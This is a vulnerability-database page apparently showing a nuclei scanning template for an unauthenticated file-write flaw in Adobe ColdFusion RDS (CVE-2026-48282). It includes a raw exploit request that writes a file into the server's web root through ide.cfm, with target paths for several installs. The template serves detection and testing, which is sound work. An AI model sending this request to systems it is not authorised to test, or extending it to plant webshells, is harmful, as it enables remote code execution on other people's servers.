Lucene search
K

Adobe ColdFusion - RDS Arbitrary File Write

🗓️ 09 Jul 2026 04:22:04Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 3 Views

Adobe ColdFusion RDS arbitrary file write enables unauthenticated remote code execution via path traversal.

Related
Refs
Code
id: CVE-2026-48282

info:
  name: Adobe ColdFusion - RDS Arbitrary File Write
  author: watchtowr,DhiyaneshDk
  severity: critical
  description: |
    ColdFusion versions 2025.9, 2023.20 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could lead to arbitrary code execution in the context of the current user. The RDS FILEIO WRITE operation allows unauthenticated attackers to write arbitrary files when RDS is enabled with authentication disabled. Exploitation of this issue does not require user interaction. Scope is changed.
  impact: |
    An attacker can write arbitrary files to the server filesystem, leading to remote code execution by writing CFML webshells to the web root.
  remediation: |
    Update to ColdFusion 2025 Update 10 or ColdFusion 2023 Update 21 or later.
  reference:
    - https://helpx.adobe.com/security/products/coldfusion/apsb26-68.html
    - https://labs.watchtowr.com/its-37oc-and-all-we-can-think-about-is-coldfusion-adobe-coldfusion-security-bulletin-apsb26-68-cve-bonanza/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2026-48282
    epss-score: 0.03199
    epss-percentile: 0.86593
    cwe-id: CWE-22
  metadata:
    verified: true
  tags: cve,cve2026,rce,file-upload,adobe,coldfusion,rds,intrusive,kev,vkev

variables:
  randfile: "{{to_lower(rand_text_alpha(8))}}"

flow: |
  http("write") && http("verify")

http:
  - id: write
    raw:
      - |
        POST /CFIDE/main/ide.cfm?ACTION=FILEIO HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream

        4:{{pathlen}}:{{dirpath}}{{randfile}}.txt000005:WRITE000001:0000008:{{randfile}}

    payloads:
      dirpath:
        - '/opt/coldfusion/cfusion/wwwroot/CFIDE/'
        - 'C:\ColdFusion2025\cfusion\wwwroot\CFIDE\'
        - 'C:\ColdFusion2023\cfusion\wwwroot\CFIDE\'

      pathlen:
        - '000050'
        - '000052'
        - '000052'

    attack: pitchfork
    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "1:2:")'
        condition: and
        internal: true

  - id: verify
    raw:
      - |
        GET /CFIDE/{{randfile}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{randfile}}'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b89cbf4d1b89cbeae7316cf100cb89178af14e12dcd39977c8ff2bcb43b8ff19022100b336be902dbea72088c80956852c7340c5e086c00fcfaa28d5c0e6d4da850bc2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Jul 2026 15:45Current
7.9High risk
Vulners AI Score7.9
CVSS 3.110
EPSS0.28583
SSVC
3